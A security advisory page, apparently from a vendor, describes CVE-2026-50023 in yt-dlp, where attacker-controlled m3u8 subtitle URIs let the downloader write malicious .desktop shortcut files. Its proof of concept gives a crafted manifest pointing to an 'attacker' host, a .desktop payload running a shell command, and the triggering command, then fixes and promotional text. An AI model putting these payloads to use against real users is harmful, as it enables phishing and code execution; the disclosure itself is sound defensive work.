CVE-2026-50023

CVE-2026-50023 is a high-severity security vulnerability in yt-dlp (pip), affecting versions < 2026.06.09. It is fixed in 2026.6.9.

Summary

A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519.

Details

The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as .exe or .sh) during file downloads. However, this allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.

Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an EXT-X-MEDIA:TYPE=SUBTITLES tag with a malicious URI (e.g., URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a .desktop extension if the user had passed the --write-subs option.

Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.

While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.

Proof of Concept

1. Start a malicious server:
Host a malicious master.m3u8 manifest that points to malicious subtitle payloads:

#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"

And host the payload.desktop file with malicious content:

[Desktop Entry]
Type=Application
Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
Name=Subtitle

2. Trigger the download:
In this case, the generic extractor triggers the exploit if the --write-subs option is used:

yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"

Result: yt-dlp writes MyVideo.en.desktop to disk, containing the attacker payload.

Workarounds

It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.

Users who are not able to upgrade should do ALL of the following:

  • Only pass fully trusted input URLs to yt-dlp
  • Do not use the --write-subs, --write-auto-subs, --embed-subs, --write-thumbnail, --write-all-thumbnails, or --embed-thumbnail options
  • Use --format - to interactively select download formats and validate their file extensions

Impact

CVE-2026-50023 has a CVSS score of 8.3 (High). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2026.6.9); upgrading removes the vulnerable code path.

Affected versions

yt-dlp (< 2026.06.09)

Security releases

yt-dlp → 2026.6.9 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

yt-dlp version 2026.06.09 fixes this issue by removing .url, .desktop and .webloc from the global file extension allowlist, and by only allowing those file types to be written from within the context of the --write-link options' functionality.

Frequently Asked Questions

  1. What is CVE-2026-50023? CVE-2026-50023 is a high-severity security vulnerability in yt-dlp (pip), affecting versions < 2026.06.09. It is fixed in 2026.6.9.
  2. How severe is CVE-2026-50023? CVE-2026-50023 has a CVSS score of 8.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of yt-dlp are affected by CVE-2026-50023? yt-dlp (pip) versions < 2026.06.09 is affected.
  4. Is there a fix for CVE-2026-50023? Yes. CVE-2026-50023 is fixed in 2026.6.9. Upgrade to this version or later.
  5. Is CVE-2026-50023 exploitable, and should I be worried? Whether CVE-2026-50023 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-50023 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-50023? Upgrade yt-dlp to 2026.6.9 or later.

Other vulnerabilities in yt-dlp

CVE-2026-50574CVE-2026-50023CVE-2026-50019CVE-2024-38519CVE-2024-22423

Stop the waste.
Protect your environment with Kodem.